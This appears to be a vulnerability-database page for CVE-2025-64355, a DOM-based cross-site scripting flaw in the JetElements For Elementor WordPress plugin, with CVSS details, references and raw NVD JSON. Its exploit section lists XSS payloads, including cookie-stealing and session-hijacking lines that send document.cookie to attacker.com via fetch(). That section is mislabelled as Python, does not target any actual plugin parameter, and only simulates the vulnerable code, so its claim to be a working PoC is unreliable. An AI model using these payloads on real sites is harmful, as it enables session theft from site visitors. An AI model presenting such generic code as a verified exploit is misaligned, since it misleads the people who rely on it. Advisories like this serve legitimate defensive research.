CVE-2025-64355

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Crocoblock JetElements For Elementor jet-elements allows DOM-Based XSS.This issue affects JetElements For Elementor: from n/a through <= 2.7.12.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

JetElements For Elementor <= 2.7.12

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2025-64355 PoC - JetElements For Elementor DOM-based XSS -->
<!-- This PoC demonstrates a DOM-based XSS in JetElements For Elementor plugin -->
<!-- Usage: Inject this payload through plugin's vulnerable parameter handling -->

<!-- Basic XSS Payload -->
<img src=x onerror="alert(document.domain)">

<!-- Cookie Stealing Payload -->
<img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">

<!-- Session Hijacking Payload -->
<svg/onload=fetch('https://attacker.com/log?data='+btoa(document.cookie))>

<!-- DOM Manipulation Payload -->
<script>
  // Example of how the vulnerable code might process user input
  // This simulates the vulnerable endpoint behavior
  var userInput = location.hash.substring(1); // or URL parameter
  document.write(userInput); // Vulnerable: Direct write without sanitization
</script>

<!-- Exploitation Steps:
1. Attacker crafts a malicious URL with XSS payload in affected parameter
2. Victim clicks the link or visits the page containing the payload
3. Plugin processes the parameter without proper sanitization
4. Malicious script executes in victim's browser context
5. Attacker can steal cookies, session tokens, or perform actions as victim
-->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-64355
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-64355
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-64355/
[4] VulDB https://vuldb.com/cve/CVE-2025-64355
[5] https://patchstack.com/database/Wordpress/Plugin/jet-elements/vulnerability/wordpress-jetelements-for-elementor-plugin-2-7-12-cross-site-scripting-xss-vulnerability?_s_id=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-64355", "sourceIdentifier": "[email protected]", "published": "2025-12-18T17:15:56.577", "lastModified": "2026-04-23T15:35:12.110", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Crocoblock JetElements For Elementor jet-elements allows DOM-Based XSS.This issue affects JetElements For Elementor: from n/a through <= 2.7.12."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/jet-elements/vulnerability/wordpress-jetelements-for-elementor-plugin-2-7-12-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}